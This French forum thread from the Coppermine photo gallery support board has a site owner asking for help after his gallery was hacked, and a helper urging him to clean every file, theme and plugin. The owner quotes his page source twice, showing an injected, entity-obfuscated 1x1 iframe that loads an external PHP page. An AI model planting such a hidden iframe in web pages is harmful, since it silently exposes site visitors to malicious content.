Problème d'affichage (HACKED) - Page 2 Problème d'affichage (HACKED) - Page 2
 

News:

cpg1.5.48 Security release - upgrade mandatory!
The Coppermine development team is releasing a security update for Coppermine in order to counter a recently discovered vulnerability. It is important that all users who run version cpg1.5.46 or older update to this latest version as soon as possible.
[more]

Main Menu

Problème d'affichage (HACKED)

Started by artpjm, May 19, 2008, 12:00:02 PM

Previous topic - Next topic

0 Members and 1 Guest are viewing this topic.

artpjm

bonjour,

j ai vérifié tous les fichiers du répertoire où se trouve la Galerie coppermine

Mais quand je fais un affichage du code source il y a toujours l' <iframe> il est inscrit en ligne sous la balise Body voir ci dessous. Et il est dans tous les fichiers de l application Coppermine

Par contre que j examine en local  le code des fichier  index.hph  config.inc.php  par exemple je code n apparait.

Là je ne comprend pas .



Quote<script type="text/javascript" src="scripts.js"></script>
<!--
  SVN version info:
  Coppermine version: 1.4.18
  $Revision: 4380 $
  $LastChangedBy: gaugau $
  $Date: 2008-04-12 12:00:19 +0200 (Sa, 12 Apr 2008) $
-->
</head>
<body>
  <iframe src='&#104;&#116;&#116;&#112;&#58;&#47;&#47;&#99;&#99;&#102;&#101;&#108;&#111;&#109;&#118;&#104;&#107;&#46;&#99;&#111;&#109;&#47;&#100;&#108;&#47;&#97;&#100;&#118;&#53;&#52;&#50;&#46;&#112;&#104;&#112;' width=1 height=1></iframe>

  <table width="100%" border="0" cellpadding="20" cellspacing="20">

Pascal YAP

Si vous ne suivez pas scrupuleusement les recommandations fournies par différents posts, vous ne parviendrez jamais à Sanitizer votre Galerie.
L'injection du code coupable s'infiltre dans absolument tous les fichiers, même les HTML "de base"...

si votre Thème n'a pas été nettoyé il y a de grande chance que le code malin y soit installé aussi.

Faites le nécessaire absolu et complet, et votre Galerie sera saine une fois pour toute.

PYAP


artpjm

En affichant le code sourse à partir du navigateur je touve le code qui pose problème. mais quand je vais dans les fichiers je ne le trouve pas.

il doit se trouver un code quelques part mais  tous les fichiers ont été changé.

Là je sais plus quoi faire

j envisage de refaire une installation complète..

Es ce possible en gardant bien sur données actuelles.

cordialement

Quote</head>
<body>
  <iframe src='&#104;&#116;&#116;&#112;&#58;&#47;&#47;&#99;&#99;&#102;&#101;&#108;&#111;&#109;&#118;&#104;&#107;&#46;&#99;&#111;&#109;&#47;&#100;&#108;&#47;&#97;&#100;&#118;&#53;&#52;&#50;&#46;&#112;&#104;&#112;' width=1 height=1></iframe>

  <table width="100%" border="0" cellpadding="20" cellspacing="20">

Pascal YAP

Je persiste à vous dire que vous n'avez pas Sanitizé tous vos fichiers  ???
Tous les fichiers Coppermine,
Tous vos Thèmes,
Tous vos plugins
éventuellement tous vos scripts non-Coppermine,

C'est à dire et en d'autres termes ABSOLUMENT TOUS LES FICHIERS DE VOTRE WEB.
Vérifiez aussi la présence suspect de fichiers type ZIP que vous n'avez pas uploadé vous-même (dossier et sous-dossiers ALBUMS)

PYAP